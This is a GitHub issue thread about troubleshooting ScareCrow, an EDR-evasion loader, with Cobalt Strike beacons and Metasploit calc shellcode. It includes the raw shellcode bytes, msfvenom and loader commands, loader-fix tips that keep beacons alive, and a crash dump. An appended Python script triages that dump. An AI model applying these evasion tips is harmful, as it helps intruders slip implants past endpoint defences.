Is this project still working? experiencing issues loading several shellcodes #69
Comments
Yes, this project is very much still working. It looks like it's your shellcode; unfortunately, I can't help you as I'm not sure what your shellcode looks like (posting debug outputs doesn't help me when I don't know what's being loaded). It could be a UDRL in the case of Cobalt Strike or something else. Based on your output, I suggest you try some of the other loaders built into ScareCrow.
OK, will do some research and update on this. Thanks for the quick response :)
Posting the calc shellcode used: \xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00 Maybe it's the null bytes?
Tried without null bytes as well, still not working; will check it further and update.
FYI @sl4cky I was running into this same issue with fresh stageless shellcode for CS. I unloaded my UDRL and made a new payload with ScareCrow and everything was resolved. |
It sounds like it could be a UDRL issue. Hard to know for sure without all the details of the C2 and other things going into your payload.
I ended up getting this error too; in my case the "image_size_x64" value was too low, and c2lint called it out too. Not sure if this is related to more recent changes, because the profile used to work, but maybe this helps. I also ran into an issue where the binary output is unreliable. Sometimes it straight exits; other times I can see the beacon come in and then die (sometimes after a few successful sleep cycles). I turned off any custom settings in the profile/UDRL, but the issue persisted. I ended up modifying the loader routine so it uses VirtualAlloc + write (just like the DLL loader) instead of the pointer trickery + VirtualProtect. This solved it, and it is now consistently triggering and stays alive. Again, it used to work, so maybe the latest CS changes are causing an access violation somewhere?
Came back to say that I'm experiencing similar issues to @ptr0x1. With bone-stock CS shellcode (4.8 release), I will very rarely get a beacon callback, and if I do, it dies shortly after. Same outcome for binary payloads and DLLs, so something must be causing issues with the new CS versions, as my previous comment was from old CS shellcode (< 4.7). I'm going to tinker with this a good bit in the coming days and see if I can find some answers.
I was able to implement the fix @ptr0x1 spoke about (using the DLL loader for the Binary template) and everything works fine. @Tylous I didn't submit a PR for it since it's not really a fix, but the code's in my fork here: https://github.com/chucksploit/ScareCrow. I'm still trying to see what the root cause is. |
I am working on a new version (which should be out shortly) that replaces the old binary template with 4 new ones. The Binary template no longer works with the latest versions of Golang. As a result, the new version will provide several universal templates.
ScareCrow 5.0 is out now; this should take care of this. Please feel free to re-open this if you still experience it.
I tested the framework using different shellcodes, but I keep getting errors or nothing happens; I have used console output for debugging.
./ScareCrow -I beacon.bin -domain www.microsoft.com -console
The shellcode is a stageless Cobalt Strike shellcode. I'm getting the following output from the console, and there is no callback to the C2:
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\advapi32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
[DEBUG] [*] Overwriting shellcode String with Pointer's attributes
I also tried with Metasploit calc shellcode:
msfvenom -p windows/x64/exec CMD="calc.exe" -f raw -o ok.bin
using the same flags as before, and got the following error on the console:
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\advapi32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
[DEBUG] [*] Overwriting shellcode String with Pointer's attributes
Exception 0xc0000005 0x0 0x1b11ab67000 0xc000138000
PC=0xc000138000
runtime.cgocall(0xf0b60, 0x267ec0)
runtime/cgocall.go:158 +0x4a fp=0xc000107e18 sp=0xc000107de0 pc=0x935ea
rnmzBzfN.JjYY7ypK(0xc000138000?, {0xc000107eb0?, 0x3?, 0x9c767?})
runtime/syscall_windows.go:557 +0x109 fp=0xc000107e90 sp=0xc000107e18 pc=0xebea9
rnmzBzfN.ES5BzOlzgpnB(0x180050?, 0xc000013170?, 0x5?, 0x5?, 0x0?)
runtime/syscall_windows.go:495 +0x3b fp=0xc000107ed8 sp=0xc000107e90 pc=0xebc7b
main.main()
uSiSpGymJxKf.go:1 +0x2c7 fp=0xc000107f80 sp=0xc000107ed8 pc=0x154c07
runtime.main()
runtime/proc.go:250 +0x1fe fp=0xc000107fe0 sp=0xc000107f80 pc=0xc7bbe
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000107fe8 sp=0xc000107fe0 pc=0xef2c1
goroutine 2 [force gc (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000045fb0 sp=0xc000045f90 pc=0xc7f56
runtime.goparkunlock(...)
runtime/proc.go:369
runtime.forcegchelper()
runtime/proc.go:302 +0xb1 fp=0xc000045fe0 sp=0xc000045fb0 pc=0xc7df1
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000045fe8 sp=0xc000045fe0 pc=0xef2c1
created by runtime.init.6
runtime/proc.go:290 +0x25
goroutine 3 [GC sweep wait]:
runtime.gopark(0x1?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000047f90 sp=0xc000047f70 pc=0xc7f56
runtime.goparkunlock(...)
runtime/proc.go:369
runtime.bgsweep(0x0?)
runtime/mgcsweep.go:297 +0xd7 fp=0xc000047fc8 sp=0xc000047f90 pc=0xb2bd7
runtime.gcenable.func1()
runtime/mgc.go:178 +0x26 fp=0xc000047fe0 sp=0xc000047fc8 pc=0xa7926
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000047fe8 sp=0xc000047fe0 pc=0xef2c1
created by runtime.gcenable
runtime/mgc.go:178 +0x6b
goroutine 4 [GC scavenge wait]:
runtime.gopark(0xc00001c070?, 0x1a8d00?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000057f70 sp=0xc000057f50 pc=0xc7f56
runtime.goparkunlock(...)
runtime/proc.go:369
runtime.(*scavengerState).park(0x267800)
runtime/mgcscavenge.go:389 +0x53 fp=0xc000057fa0 sp=0xc000057f70 pc=0xb0c13
runtime.bgscavenge(0x0?)
runtime/mgcscavenge.go:622 +0x65 fp=0xc000057fc8 sp=0xc000057fa0 pc=0xb1225
runtime.gcenable.func2()
runtime/mgc.go:179 +0x26 fp=0xc000057fe0 sp=0xc000057fc8 pc=0xa78c6
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000057fe8 sp=0xc000057fe0 pc=0xef2c1
created by runtime.gcenable
runtime/mgc.go:179 +0xaa
goroutine 5 [finalizer wait]:
runtime.gopark(0x0?, 0x185b00?, 0x60?, 0x1?, 0x2000000020?)
runtime/proc.go:363 +0xd6 fp=0xc000049e28 sp=0xc000049e08 pc=0xc7f56
runtime.goparkunlock(...)
runtime/proc.go:369
runtime.runfinq()
runtime/mfinal.go:180 +0x10f fp=0xc000049fe0 sp=0xc000049e28 pc=0xa6a2f
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000049fe8 sp=0xc000049fe0 pc=0xef2c1
created by runtime.createfing
runtime/mfinal.go:157 +0x45
goroutine 18 [GC worker (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000053f50 sp=0xc000053f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000053fe0 sp=0xc000053f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000053fe8 sp=0xc000053fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
goroutine 34 [GC worker (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000515f50 sp=0xc000515f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000515fe0 sp=0xc000515f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000515fe8 sp=0xc000515fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
goroutine 35 [GC worker (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000517f50 sp=0xc000517f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000517fe0 sp=0xc000517f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000517fe8 sp=0xc000517fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
goroutine 36 [GC worker (idle)]:
runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000511f50 sp=0xc000511f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000511fe0 sp=0xc000511f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000511fe8 sp=0xc000511fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
goroutine 19 [GC worker (idle)]:
runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000055f50 sp=0xc000055f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000055fe0 sp=0xc000055f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000055fe8 sp=0xc000055fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
goroutine 6 [GC worker (idle)]:
runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000059f50 sp=0xc000059f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000059fe0 sp=0xc000059f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000059fe8 sp=0xc000059fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
goroutine 37 [GC worker (idle)]:
runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000513f50 sp=0xc000513f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000513fe0 sp=0xc000513f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000513fe8 sp=0xc000513fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
goroutine 38 [GC worker (idle)]:
runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?)
runtime/proc.go:363 +0xd6 fp=0xc000525f50 sp=0xc000525f30 pc=0xc7f56
runtime.gcBgMarkWorker()
runtime/mgc.go:1235 +0xf1 fp=0xc000525fe0 sp=0xc000525f50 pc=0xa9931
runtime.goexit()
runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000525fe8 sp=0xc000525fe0 pc=0xef2c1
created by runtime.gcBgMarkStartWorkers
runtime/mgc.go:1159 +0x25
rax 0xc000138000
rbx 0x267ec0
rcx 0x0
rdi 0xf11aa2f000
rsi 0xc000107e50
rbp 0xc000107e08
rsp 0xf11adffcc8
r8 0x0
r9 0x0
r10 0x0
r11 0x202
r12 0xc000013170
r13 0x0
r14 0xc000042000
r15 0xffffffffffffffff
rip 0xc000138000
rflags 0x10297
cs 0x33
fs 0x53
gs 0x2b
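The crash above is the Go runtime's Windows exception report: the first line carries the NTSTATUS code, the two EXCEPTION_RECORD information fields and the faulting PC, followed by goroutine traces and a register dump. The triage script below is an added example (not ScareCrow's code and not from anyone in this thread): it parses that header and the register block from a constructed excerpt of the dump, names the status code, decodes the documented read/write/DEP flag and inaccessible address for an access violation, and lists which registers equal the faulting PC. On this excerpt it reports a read fault at 0x1b11ab67000 with rip and rax both at 0xc000138000, the same value that appears as the first argument of the obfuscated call frame in the trace; reading that as "the fault was raised with the instruction pointer at the start of the buffer handed to the call" is an interpretation, not something the script proves.

```python
"""Triage helper for a Go-on-Windows crash dump (added example, not ScareCrow code).

The Go runtime prints:  Exception <code> <info[0]> <info[1]> <pc>
followed later by a register block such as "rax 0x...". This script
parses both and decodes the fields using the documented NTSTATUS and
EXCEPTION_RECORD meanings.
"""
import re

# Constructed excerpt of the dump quoted in the issue: only the lines the
# triage needs (exception header, PC line, a frame, and some registers).
CRASH_DUMP = """\
Exception 0xc0000005 0x0 0x1b11ab67000 0xc000138000
PC=0xc000138000
runtime.cgocall(0xf0b60, 0x267ec0)
runtime/cgocall.go:158 +0x4a fp=0xc000107e18 sp=0xc000107de0 pc=0x935ea
main.main()
rax 0xc000138000
rbx 0x267ec0
rcx 0x0
rsp 0xf11adffcc8
r15 0xffffffffffffffff
rip 0xc000138000
rflags 0x10297
cs 0x33
"""

# NTSTATUS values that commonly appear in Go "Exception" headers on Windows.
EXCEPTION_NAMES = {
    0xC0000005: "STATUS_ACCESS_VIOLATION",
    0xC000001D: "STATUS_ILLEGAL_INSTRUCTION",
    0xC0000094: "STATUS_INTEGER_DIVIDE_BY_ZERO",
    0xC00000FD: "STATUS_STACK_OVERFLOW",
}

# For STATUS_ACCESS_VIOLATION, ExceptionInformation[0] is the access kind
# (0 = read, 1 = write, 8 = user-mode DEP violation) and
# ExceptionInformation[1] is the inaccessible virtual address.
ACCESS_KIND = {0: "read", 1: "write", 8: "execute (DEP)"}

EXC_RE = re.compile(
    r"^Exception (0x[0-9a-f]+) (0x[0-9a-f]+) (0x[0-9a-f]+) (0x[0-9a-f]+)$", re.M
)
# Register lines: "rax 0x...", "r8 0x...", "rip 0x...", "rflags 0x...", "cs 0x..."
REG_RE = re.compile(r"^(r[a-z0-9]+|cs|fs|gs) (0x[0-9a-f]+)$", re.M)


def parse_go_crash(dump):
    """Return the raw header fields and the register dump as integers."""
    m = EXC_RE.search(dump)
    if m is None:
        raise ValueError("no Go 'Exception' header found in dump")
    code, info0, info1, pc = (int(x, 16) for x in m.groups())
    regs = {name: int(val, 16) for name, val in REG_RE.findall(dump)}
    return {"code": code, "info0": info0, "info1": info1, "pc": pc, "regs": regs}


def triage(dump):
    """Decode the parsed fields into a small, human-meaningful summary."""
    p = parse_go_crash(dump)
    result = {
        "code": p["code"],
        "exception": EXCEPTION_NAMES.get(p["code"], "unknown"),
        "pc": p["pc"],
        # Registers whose value equals the faulting PC, sorted for stable output.
        "regs_equal_pc": sorted(n for n, v in p["regs"].items() if v == p["pc"]),
    }
    if p["code"] == 0xC0000005:
        result["access"] = ACCESS_KIND.get(p["info0"], "unknown")
        result["fault_addr"] = p["info1"]
        # True when the inaccessible address is the PC itself (an instruction
        # fetch from unreadable memory); False when data at another address failed.
        result["fault_at_pc"] = p["info1"] == p["pc"]
    return result


def report(dump):
    """Render the triage summary as text; returned rather than printed."""
    t = triage(dump)
    lines = [
        "exception : %s (0x%08x)" % (t["exception"], t["code"]),
        "pc        : 0x%x" % t["pc"],
    ]
    if "access" in t:
        lines.append("access    : %s of 0x%x" % (t["access"], t["fault_addr"]))
        lines.append("fault==pc : %s" % t["fault_at_pc"])
    lines.append("regs==pc  : %s" % (", ".join(t["regs_equal_pc"]) or "none"))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(CRASH_DUMP))
```

To run it over a real dump, paste the full crash text into CRASH_DUMP or read it from a file; the register regex is anchored to whole lines, so goroutine frames (which contain "pc=0x..." mid-line) are not mistaken for registers.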